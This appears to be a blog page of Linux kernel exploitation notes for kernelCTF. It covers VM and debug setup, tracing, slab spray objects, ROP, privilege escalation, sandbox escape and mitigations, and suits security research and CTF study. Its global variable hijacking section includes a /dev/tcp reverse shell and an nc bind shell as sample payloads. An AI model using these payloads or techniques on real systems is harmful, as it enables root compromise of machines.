Welcome to Jekyll!
Linux Kernel
Resources
kernelCTF
VM setup
# 1. Get VM script
https://github.com/google/security-research/blob/88077ea2e1beaa17107cd9d7ee6beb97faa6468e/kernelctf/simulator/local_runner.sh
# 2. Update qemu script
-fsdev local,id=test_dev,path=<PATH_OF_SHARED_FOLDER>,security_model=none \
-device virtio-9p-pci,fsdev=test_dev,mount_tag=test_mount \
# 3. Mount 9pfs
## 3.1 unpack the ramdisk
gunzip ramdisk_v1.img
## 3.2 append the following line to file "/init"
mount -t 9p -o trans=virtio -o version=9p2000.L test_mount ${rootmnt}/chroot/mnt
## 3.3 pack back ramfs cpio
find . -print0 | cpio --null --owner=root -o --format=newc > ../ramdisk_v1.img
Information
# Kernel image (bzImage)
wget https://storage.googleapis.com/kernelctf-build/releases/lts-X.X.X/bzImage
# Kernel image (vmlinux)
wget https://storage.googleapis.com/kernelctf-build/releases/lts-X.X.X/vmlinux.gz
# Kernel config
wget https://storage.googleapis.com/kernelctf-build/releases/lts-X.X.X/.config
# Source code info
## LTS
curl https://storage.googleapis.com/kernelctf-build/releases/lts-X.X.X/COMMIT_INFO
wget https://github.com/gregkh/linux/archive/<COMMIT_HASH>.zip
wget https://github.com/gregkh/linux/archive/$(curl -s https://storage.googleapis.com/kernelctf-build/releases/lts-X.X.X/COMMIT_INFO | sed -n 's/COMMIT_HASH=//p').zip
## COS
curl https://storage.googleapis.com/kernelctf-build/releases/cos-X.X.X/COMMIT_INFO
wget https://cos.googlesource.com/third_party/kernel/+archive/<COMMIT_HASH>.tar.gz
wget https://cos.googlesource.com/third_party/kernel/+archive/$(curl -s https://storage.googleapis.com/kernelctf-build/releases/cos-X.X.X/COMMIT_INFO | sed -n 's/COMMIT_HASH=//p').tar.gz
# Commit info
https://github.com/torvalds/linux/commit/<COMMIT_HASH>
Compilation
# compile x64 version kernel on aarch64
make ARCH=x86_64 CROSS_COMPILE=x86_64-linux-gnu- -j`nproc`
# kernel module
make ARCH=x86_64 CROSS_COMPILE=x86_64-linux-gnu- -j`nproc` modules_prepare
Makefile of the kernel module test.c
obj-m += test.o
all:
make ARCH=x86_64 CROSS_COMPILE=x86_64-linux-gnu- -C /<path_to_src> M=$(PWD) modules
clean:
make ARCH=x86_64 CROSS_COMPILE=x86_64-linux-gnu- -C /<path_to_src> M=$(PWD) clean
Modify Image
# 1. DOS/MBR boot sector image (e.g., kernelCTF image)
sudo mount -o loop,offset=1048576 <image_file> rootfs
sudo umount rootfs
# 2. Mount image via dbus on some Linux distributions
## attach image to loop device and mount in /media/<username>/...
udisksctl loop-setup -f <image_file>
## show all loop device
losetup -a
## unmount
udisksctl unmount -b /dev/loopN
Ubuntu specific version
# Ubuntu official page
https://blueprints.launchpad.net/ubuntu/jammy/amd64/linux-image-5.15.0-69-generic/5.15.0-69.76
https://blueprints.launchpad.net/ubuntu/jammy/amd64/linux-modules-5.15.0-69-generic/5.15.0-69.76
# download image & modules
wget http://launchpadlibrarian.net/656759576/linux-image-5.15.0-69-generic_5.15.0-69.76_amd64.deb
wget http://launchpadlibrarian.net/656414807/linux-modules-5.15.0-69-generic_5.15.0-69.76_amd64.deb
# unpack & install
sudo dpkg -i *.deb
# find the menu entry
sudo awk -F\' '/menuentry / {print $4}' /boot/grub/grub.cfg
# set the default kernel
sudo vim /etc/default/grub
## if output is "gnulinux-5.15.0-69-generic-advanced-277588d7-7692-4c38-8e63-1b553b7d66b8", set
## GRUB_DEFAULT="gnulinux-advanced-277588d7-7692-4c38-8e63-1b553b7d66b8>gnulinux-5.15.0-69-generic-advanced-277588d7-7692-4c38-8e63-1b553b7d66b8"
# update grub
sudo update-grub
Ubuntu (24.04+) Debug
Source Code
- Add the snippet below to the file /etc/apt/sources.list.d/ubuntu.sources.
Types: deb-src
URIs: http://archive.ubuntu.com/ubuntu/
Suites: noble noble-updates noble-backports noble-proposed
Components: main restricted universe multiverse
Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg
- Update the list of available packages by running sudo apt update.
- Download the kernel source code.
sudo apt install dpkg-dev
apt source linux-image-unsigned-$(uname -r)
or
http://tw.archive.ubuntu.com/ubuntu/pool/main/l/linux/<linux_6.8.0.orig.tar.gz>
Debug Image
Ref: https://ubuntu.com/server/docs/debug-symbol-packages
- Install the dbgsym keyring.
sudo apt install ubuntu-dbgsym-keyring
- Create the file /etc/apt/sources.list.d/ddebs.list with the content below.
deb http://ddebs.ubuntu.com noble main restricted universe multiverse
deb http://ddebs.ubuntu.com noble-updates main restricted universe multiverse
deb http://ddebs.ubuntu.com noble-proposed main restricted universe multiverse
- Download the kernel image with debug symbols.
apt install linux-image-unsigned-$(uname -r)-dbgsym
- Show debug package information.
dpkg-query -L linux-image-unsigned-$(uname -r)-dbgsym
## vmlinux path
/usr/lib/debug/boot/vmlinux-6.8.0-49-generic
## kernel module path
/usr/lib/debug/lib/modules/6.8.0-49-generic/kernel
RHEL (Red Hat Enterprise Linux)
Source Code
You may not be able to access the source code of RHEL directly. However, Rocky Linux is fully compatible with RHEL and is an open-source project. Therefore, you can theoretically view the source code through Rocky Linux instead.
The following link is one of the mirrors for Rocky Linux: https://mirrors.up.pt/rocky/9/BaseOS/source/tree/Packages/k/
rpm2cpio kernel-5.14.0-503.40.1.el9_5.src.rpm > tmp.cpio
cpio -i -d < tmp.cpio
ls -al linux-5.14.0-503.40.1.el9_5.tar.xz
Installation
Red Hat provides a no-cost subscription for developers, so you don’t need to purchase a license. For more details, refer to: https://developers.redhat.com/articles/faqs-no-cost-red-hat-enterprise-linux
Others
Update the kernel to the latest:
sudo dnf install kernel
The kernel module path (RHEL 9.5):
/lib/modules/5.14.0-503.XXX.1.el9_5.x86_64
ftrace
cat /proc/kallsyms | grep function_name # make sure the function is not inlined
echo \<function_name\> > /sys/kernel/debug/tracing/set_ftrace_filter
echo function > /sys/kernel/debug/tracing/current_tracer
echo 1 > /sys/kernel/debug/tracing/options/func_stack_trace
echo 1 > /sys/kernel/debug/tracing/tracing_on
# ... trigger function
cat /sys/kernel/debug/tracing/trace
# clear output
echo > /sys/kernel/debug/tracing/trace
# turn off
echo 0 > /sys/kernel/debug/tracing/tracing_on
kprobe
# Set a return probe (r = return probe) on the function and print its return value
echo 'r:myprobe <function_name> $retval' > /sys/kernel/debug/tracing/kprobe_events
echo 1 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
echo 0 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
# Set a return probe and print the 64-bit value at an offset of 80 bytes from the return value (used as a pointer)
echo 'r:myprobe <function_name> data_ptr=+80($retval):u64' > /sys/kernel/debug/tracing/kprobe_events
echo 1 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
echo 0 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
# Set an entry probe (p = probe) on the function and print the third argument
echo 'p:myprobe <function_name> $arg3' > /sys/kernel/debug/tracing/kprobe_events
echo 1 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
echo 0 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
# Display the trace output and then clear the trace buffer
cat /sys/kernel/debug/tracing/trace
echo > /sys/kernel/debug/tracing/trace
Common Objects Refcount Fields
// struct file
// refcount++: fdget()
// refcount--: fdput()
file->f_count;
// struct sock
// refcount++: sock_hold()
// refcount--: sock_put()
#define sk_refcnt __sk_common.skc_refcnt
sk->__sk_common.skc_refcnt;
// struct mm_struct
// refcount++: mmgrab()
// refcount--: mmdrop()
mm->mm_count;
// struct mm_struct (user space)
// refcount++: mmget() / mmget_not_zero()
// refcount--: mmput()
mm->mm_users;
// struct pid
// refcount++: get_pid()
// refcount--: put_pid()
pid->count;
// struct task_struct
// refcount++: get_task_struct()
// refcount--: put_task_struct()
t->usage;
// struct cred
// refcount++: get_cred()
// refcount--: put_cred()
cred->usage;
// struct page
// refcount++: try_get_page()
// refcount--: put_page_testzero()
page->_refcount;
// struct ns_common ns (namespace member)
// take time_namespace (struct time_namespace) as example
// refcount++: get_time_ns()
// refcount--: put_time_ns()
ns->ns.count;
// struct nsproxy ns
// refcount++: get_nsproxy()
// refcount--: put_nsproxy()
ns->count;
// struct user_struct
// refcount++: get_uid()
// refcount--: free_uid()
u->__count;
// struct files_struct (current->files)
// refcount++: atomic_inc(&oldf->count)
// refcount--: put_files_struct()
files->count;
Common Objects Lock Functions
// struct mm_struct
mmap_read_lock(current->mm);
mmap_read_unlock(current->mm);
// struct sock
lock_sock(sk);
release_sock(sk);
// struct files_struct
spin_lock(&files->file_lock);
/* fdt = files_fdtable(files) */
spin_unlock(&files->file_lock);
virt & page
#define __START_KERNEL_map (0xffffffff80000000)
extern unsigned long phys_base; // 0 when nokaslr
extern unsigned long page_offset_base; // 0xffff888000000000 when nokaslr
extern unsigned long vmemmap_base; // 0xffffea0000000000 when nokaslr
struct page *virt_to_page(unsigned long virt_addr) {
    unsigned long pfn;
    if (virt_addr >= __START_KERNEL_map)
        // address inside the kernel image mapping
        pfn = (virt_addr - __START_KERNEL_map + phys_base) >> 12;
    else
        // address inside the direct mapping
        pfn = (virt_addr - page_offset_base) >> 12;
    // sizeof(struct page) == 0x40
    return (struct page *)(vmemmap_base + 0x40 * pfn);
}
void *page_to_virt(unsigned long page_addr) {
    unsigned long pfn = (page_addr - vmemmap_base) / 0x40;
    // always returns the direct-mapping address of the page
    return (void *)((pfn << 12) + page_offset_base);
}
Exploit
Techniques
Pin CPU
Use sched_setaffinity() or pthread_setaffinity_np().
#define _GNU_SOURCE
#include <sched.h>

void pin_on_cpu(int cpu_id)
{
    cpu_set_t cpuset;
    CPU_ZERO(&cpuset);
    CPU_SET(cpu_id, &cpuset);
    // pid 0 means the calling thread
    sched_setaffinity(0, sizeof(cpu_set_t), &cpuset);
}
KASLR bypass
- Use side channels like EntryBleed.
- In older versions of Ubuntu, the address of the kernel function startup_xen could be read from /sys/kernel/notes. (fixed by CVE-2024-26816)
Auto-reboot after panic or oops
- Set panic_on_oops=1 and panic_timeout=1.
Global variable hijacking
- modprobe_path[]
  - It is triggered when attempting to execute a file of unknown format.
  - E.g. modprobe_path[] = "/tmp//modprobe"
- core_pattern[]
  - It is triggered when an executable raises SIGSEGV; alternatively, zero out task_struct->mm->pgd to trigger a page fault.
  - E.g. core_pattern[] = "|/bin/bash -c sh</dev/tcp/ip/port"
- poweroff_cmd[]
  - It is basically never triggered on its own; you need to chain it with other gadgets, such as tcp_prot.close = &poweroff_work_func.
  - E.g. poweroff_cmd[] = "/bin/sh -c /bin/sleep${IFS}10&&/usr/bin/nc${IFS}-lnvp${IFS}13337${IFS}-e${IFS}/bin/bash"
- compat_elf_format->load_binary (last formats entry)
  - rbx will hold the file content, which allows you to build a ROP chain.
  - It can be triggered by executing a file of unknown format.
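The modprobe_path and load_binary triggers above both rely on executing a file that no binary format handler recognizes. A minimal userspace sketch of that trigger follows; the helper name trigger_unknown_binfmt() and the 0xff magic bytes are illustrative assumptions, not taken from the original notes. Non-printable bytes are used on the assumption that the kernel only asks for a binfmt module in that case.

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical helper: write a 4-byte file with a non-printable magic
 * and try to execve() it in a child process.
 * Returns the errno reported by execve() in the child (ENOEXEC is the
 * usual result for an unknown format), or -1 if the helper itself failed.
 */
int trigger_unknown_binfmt(const char *path)
{
    static const unsigned char magic[4] = { 0xff, 0xff, 0xff, 0xff };
    int status;
    pid_t pid;

    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0)
        return -1;
    if (write(fd, magic, sizeof(magic)) != (ssize_t)sizeof(magic)) {
        close(fd);
        return -1;
    }
    close(fd);
    /* Make sure the exec bits survive a restrictive umask. */
    if (chmod(path, 0755) < 0)
        return -1;

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)path, NULL };
        char *const envp[] = { NULL };
        execve(path, argv, envp);
        /* Only reached when execve() fails. */
        _exit(errno & 0xff);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Calling trigger_unknown_binfmt("/tmp/dummy") after overwriting modprobe_path[] is the usual pattern; the path is a placeholder and must live on a filesystem that allows execution.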
Kernel shellcode
- Make a kernel address executable with set_memory_x(page_aligned_addr, num_of_page).
- Leak ktext in shellcode - use the rdmsr instruction with MSR_LSTAR. (see syscall_init() for more details)
Privilege escalation
commit_creds(&init_cred)
Sandbox escape
- Use ROP to call switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy).
- Return to userspace and switch to the root namespaces with
setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
setns(open("/proc/1/ns/pid", O_RDONLY), 0);
setns(open("/proc/1/ns/net", O_RDONLY), 0);
Find target task
- prctl(PR_SET_NAME) changes the process name to a unique ID.
- Start iterating through the struct task_struct linked list from &init_task and compare each task’s name with the unique ID.
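The userspace half of this lookup can be sketched as below. The helper name set_task_tag() and the COMM_LEN constant are illustrative assumptions; the kernel stores the name in a 16-byte field, so tags longer than 15 characters are silently truncated and should be avoided.

```c
#include <string.h>
#include <sys/prctl.h>

/* Mirrors the kernel's 16-byte comm field (15 characters plus NUL). */
#define COMM_LEN 16

/*
 * Hypothetical helper: set the calling thread's name to `tag` and read
 * it back into `out`, so the caller knows the exact bytes to search for
 * while walking the task list in kernel memory.
 * Returns 0 on success, -1 on failure.
 */
int set_task_tag(const char *tag, char out[COMM_LEN])
{
    if (prctl(PR_SET_NAME, (unsigned long)tag, 0, 0, 0) != 0)
        return -1;
    memset(out, 0, COMM_LEN);
    if (prctl(PR_GET_NAME, (unsigned long)out, 0, 0, 0) != 0)
        return -1;
    return 0;
}
```

Reading the name back with PR_GET_NAME is a design choice here: it gives the exploit the exact, possibly truncated, string it later has to compare against.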
Fixed kernel address
- Before Linux v6.1, the kernel address of the CEA (CPU Entry Area) was fixed at 0xfffffe0000000000, making it possible to place the exploit payload there by triggering an exception.
Bypass error during ROP
- “Illegal context switch in RCU read-side critical section”
  - Set current->rcu_read_lock_nesting = 0.
- “BUG: scheduling while atomic: …”
  - Set oops_in_progress=1, making __schedule_bug() return safely.
ROP return to userspace
- Use the trampoline swapgs_restore_regs_and_return_to_usermode(). (renamed to common_interrupt_return() now)
- When executing iretq, the stack layout should be (from top to bottom): rip, cs, rflags, rsp and ss.
- The process calls a helper to save its state before exploiting.
static unsigned long cs, ss, rflags, rsp;

static void save_state()
{
    asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"
        "popq %2\n"
        "movq %%rsp, %3\n"
        : "=r"(cs), "=r"(ss), "=r"(rflags), "=r"(rsp)
        :
        : "memory");
}
- By using vfork() or sys_fork() combined with msleep(), the new child process is allowed to continue running while the corrupted parent process remains stuck in kernel space.
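The iretq stack layout listed above can be written into a ROP chain with a small helper. This is a sketch only: struct user_state and append_iret_frame() are hypothetical names, and the gadgets or padding that precede the frame depend on the kernel build and on where the trampoline is entered.

```c
#include <stddef.h>
#include <stdint.h>

/* Values captured by a save_state()-style helper before the exploit runs. */
struct user_state {
    uint64_t cs;
    uint64_t ss;
    uint64_t rflags;
    uint64_t rsp;
};

/*
 * Hypothetical helper: append the five-word frame that iretq consumes,
 * in the order rip, cs, rflags, rsp, ss, starting at chain[idx].
 * Returns the index of the next free slot in the chain.
 */
size_t append_iret_frame(uint64_t *chain, size_t idx, uint64_t user_rip,
                         const struct user_state *st)
{
    chain[idx++] = user_rip;    /* where execution resumes in userspace */
    chain[idx++] = st->cs;
    chain[idx++] = st->rflags;
    chain[idx++] = st->rsp;     /* userspace stack to switch back to */
    chain[idx++] = st->ss;
    return idx;
}
```

Keeping the frame in a dedicated helper makes it harder to swap cs and ss or to forget rflags, which are common causes of a fault right after returning to userspace.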
Pipe object
-
Pipe primitive (DirtyPipe) - mark the merge bit
PIPE_BUF_FLAG_CAN_MERGE
. -
PageJack - partial overwrite the
struct page *
field.
binfmt
-
Call
__register_binfmt()
to register the corrupted object into the global linked list. -
Reclaim the object and create a fake
struct linux_binfmt
object. -
Trigger ROP when analyzing the file format
Extend race window
-
make all timerfds wakeup at the same time
int epoll_fd[EPOLL_CNT]; int tfds[TFDS_CNT]; int timer_fd = timerfd_create(CLOCK_MONOTONIC, 0); struct epoll_event event = { .events = 0 }; struct itimerspec new = {.it_value.tv_nsec = 20}; for (int i = 0; i < EPOLL_CNT; i++) epoll_fd[i] = epoll_create(1); for (int i = 0; i < TFDS_CNT; i++) tfds[i] = dup(timer_fd); for (int j = 0; j < EPOLL_CNT; j++) { for (int i = 0; i < TFDS_CNT; i++) { event.data.fd = tfds[i]; epoll_ctl(epoll_fd[j], EPOLL_CTL_ADD, tfds[i], &event); } } timerfd_settime(timer_fd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
Objects
struct name | size | flags | new | free |
---|---|---|---|---|
seq_operations | 0x20 | GFP_KERNEL_ACCOUNT | open “/proc/self/stat” | close |
shm_file_data | 0x20 | GFP_KERNEL_ACCOUNT | shmat | shmdt |
msg_msg | 0x30 ~ 0x1000 | GFP_KERNEL_ACCOUNT | msgsnd | msgrcv |
msg_msgseg | 0x08 ~ 0x1000 | GFP_KERNEL_ACCOUNT | msgsnd (larger than 0x1000 - 0x30) | msgrcv |
user_key_payload | 0x18 ~ 0x7fff | GFP_KERNEL | add_key | keyctl_unlink |
pipe_buffer | 0x280 | GFP_KERNEL_ACCOUNT | pipe | close |
timerfd_ctx | 0xd8 | GFP_KERNEL | timerfd_create | close |
tty_struct | 0x2b8 | GFP_KERNEL_ACCOUNT | open “/dev/ptmx” | close |
poll_list | 0x10 ~ 0x1000 | GFP_KERNEL | poll | close |
pg_vec | pages | X | setsockopt PACKET_VERSION and PACKET_TX_RING | close |
sendmsg | 0x10 ~ 0x5000 | GFP_KERNEL | sendmsg | |
setxattr | 0x1 ~ 0xffff | GFP_KERNEL | setxattr | |
ctl_buf | 0 ~ 0x5000 | GFP_KERNEL | | |
xdp_umem | 0x70 | | | |
netlink_sock | 0x468 | | | |
Some tricks
- sendmsg - the buffer allocated by sendmsg is released immediately. However, we can use setsockopt(SO_{SND,RCV}BUF) to shrink the send and receive buffers so that they fill up, which blocks the call and prevents the buffer from being released.
int n = 0x0;
int sfd[2];
socketpair(AF_UNIX, SOCK_STREAM, 0, sfd);
setsockopt(sfd[1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n)); // 0x1200 (min sndbuf size)
setsockopt(sfd[0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n)); // 0x0900 (min rcvbuf size)
write(sfd[1], buf, 0x1181); // hanging
- pipe_buffer - we can use fcntl(F_SETPIPE_SZ) to adjust the size.
- msg_msg - with MSG_COPY, we can leak addresses without releasing the object.
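The pipe_buffer trick can be sketched as follows. The helper name resize_pipe_slots() is an assumption for illustration. The sketch also assumes that each pipe slot is backed by one page and that sizeof(struct pipe_buffer) is 40 bytes on x86-64, which matches the 0x280 entry in the table for the default 16 slots.

```c
#include <fcntl.h>
#include <unistd.h>

/* Fallback values from the Linux UAPI in case _GNU_SOURCE is not set. */
#ifndef F_SETPIPE_SZ
#define F_SETPIPE_SZ 1031
#endif
#ifndef F_GETPIPE_SZ
#define F_GETPIPE_SZ 1032
#endif

/*
 * Hypothetical helper: ask the kernel to resize the pipe to `slots`
 * pages and return the number of pages it actually uses afterwards
 * (the kernel rounds the request up to a power of two), or -1 on error.
 */
long resize_pipe_slots(int pipe_fd, long slots)
{
    long page = sysconf(_SC_PAGESIZE);
    int size;

    if (page <= 0 || slots <= 0)
        return -1;
    if (fcntl(pipe_fd, F_SETPIPE_SZ, (int)(slots * page)) < 0)
        return -1;
    size = fcntl(pipe_fd, F_GETPIPE_SZ);
    if (size < 0)
        return -1;
    return size / page;
}
```

Under the stated assumptions, resizing to 4 slots moves the pipe_buffer array to a 4 * 40 = 160 byte allocation, so the same object can be steered into a different kmalloc cache.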
Features
Mitigations
Name | Description |
---|---|
CONFIG_SLAB_FREELIST_RANDOM | Randomizes the freelist order, making the retrieval order of objects within the same slab unpredictable. |
CONFIG_SLAB_FREELIST_HARDENED | Provides enhanced security by checking for double free, randomizing the next pointer, and enforcing pointer alignment. Since allocations directly use c->freelist for returning objects, if the victim object is at the freelist head, it bypasses freelist_ptr_{decode,encode}() and avoids corruption. |
CONFIG_HARDENED_USERCOPY | Hardens memory copying between the kernel and userspace using check_object_size() . For example, copy_to_user() cannot copy data exceeding the size of the object. |
CONFIG_KMALLOC_SPLIT_VARSIZE | Allocates variable-sized objects in separate caches. However, it does not prevent UAF if the vulnerable object itself is variable-sized. |
CONFIG_DEBUG_LIST | Emits a warning when a double unlink is detected but performs no additional actions. |
CONFIG_RANDOMIZE_BASE | Implements KASLR. |
CONFIG_SLAB_VIRTUAL | Ensures slab virtual memory is never reused for a different slab. |
CONFIG_RANDOM_KMALLOC_CACHES | There are multiple generic slab caches for each size, 16 by default. The kernel selects one of them based on _RET_IP_ and a random seed. |
CONFIG_INIT_STACK_ALL_ZERO | Initializes everything on the stack (including padding) with a zero value. |
Capabilities
ns_capable() - creating a new namespace can bypass this check. Common capabilities include CAP_SYS_ADMIN (user) or CAP_NET_ADMIN (network), etc.
bool ns_capable(struct user_namespace *ns, int cap)
{
return ns_capable_common(ns, cap, CAP_OPT_NONE);
}
capable() - global, and cannot be bypassed using a new namespace.
bool capable(int cap)
{
return ns_capable(&init_user_ns, cap);
}
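To reach code guarded by ns_capable(), an unprivileged process typically creates its own user namespace together with the namespace it wants to be privileged in. A minimal sketch is shown below; can_unshare_user_net() is a hypothetical helper, and whether the call succeeds depends on system policy (for example, unprivileged user namespaces may be disabled).

```c
#include <linux/sched.h>   /* CLONE_NEWUSER, CLONE_NEWNET */
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical helper: check in a child process whether a new user
 * namespace plus a new network namespace can be created.
 * Returns 1 if unshare succeeded, 0 if it was refused, -1 on error.
 * The raw syscall is used so the sketch builds without _GNU_SOURCE.
 */
int can_unshare_user_net(void)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        long rc = syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET);
        /* On success the child holds CAP_NET_ADMIN in its own namespace. */
        _exit(rc == 0 ? 0 : 1);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status) == 0;
}
```

The check runs in a child so that the caller's own namespaces stay untouched. A real exploit would call unshare in the process that goes on to trigger the bug.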
Preemption
Name | Description |
---|---|
CONFIG_PREEMPTION | Configures whether preemption models are enabled. |
CONFIG_PREEMPT | A preemption model where all kernel code is preemptible. This option is generally not enabled by default. |
CONFIG_PREEMPT_VOLUNTARY | Another preemption model where kernel code includes specific preemption points that allow rescheduling. |
Others
x64 RO data writable
- When X86_CR0_WP (write protect) is set, the CPU cannot write to read-only pages even at privilege level 0; clearing the bit makes read-only data writable from kernel mode.
Interrupt disabled / enabled
- local_irq_disable() ultimately executes the cli instruction to disable interrupts on the current CPU; local_irq_enable() follows a similar path and eventually executes the sti instruction. disable_irq() is different: it internally calls __irq_disable(), which masks a single IRQ line at the interrupt controller.
- Even though cli clears the IF (Interrupt Enable) flag, the NMI (Non-Maskable Interrupt), whose interrupt number is 2, can still be triggered.
Debug
gdb-multiarch ./vmlinux -ex "target remote :1234"
## handle KASLR
symbol-file ./vmlinux -o <offset> # _stext - 0xffffffff81000000
GDB Stubs
# breakpoint at specific syscall
b __do_sys_<SYSCALL_NAME>
# breakpoint at syscall entry
b entry_SYSCALL_64
# show which slab the address belong to
slab contains 0xffff888104b2b2a0
## output: 0xffff888104b2b2a0 @ kmalloc-96
# show slab info
slab info kmalloc-96
# show page tables
pt
pahole
pahole -s ./vmlinux | grep -P "\t<size>\t"
pahole -C <struct_name> ./vmlinux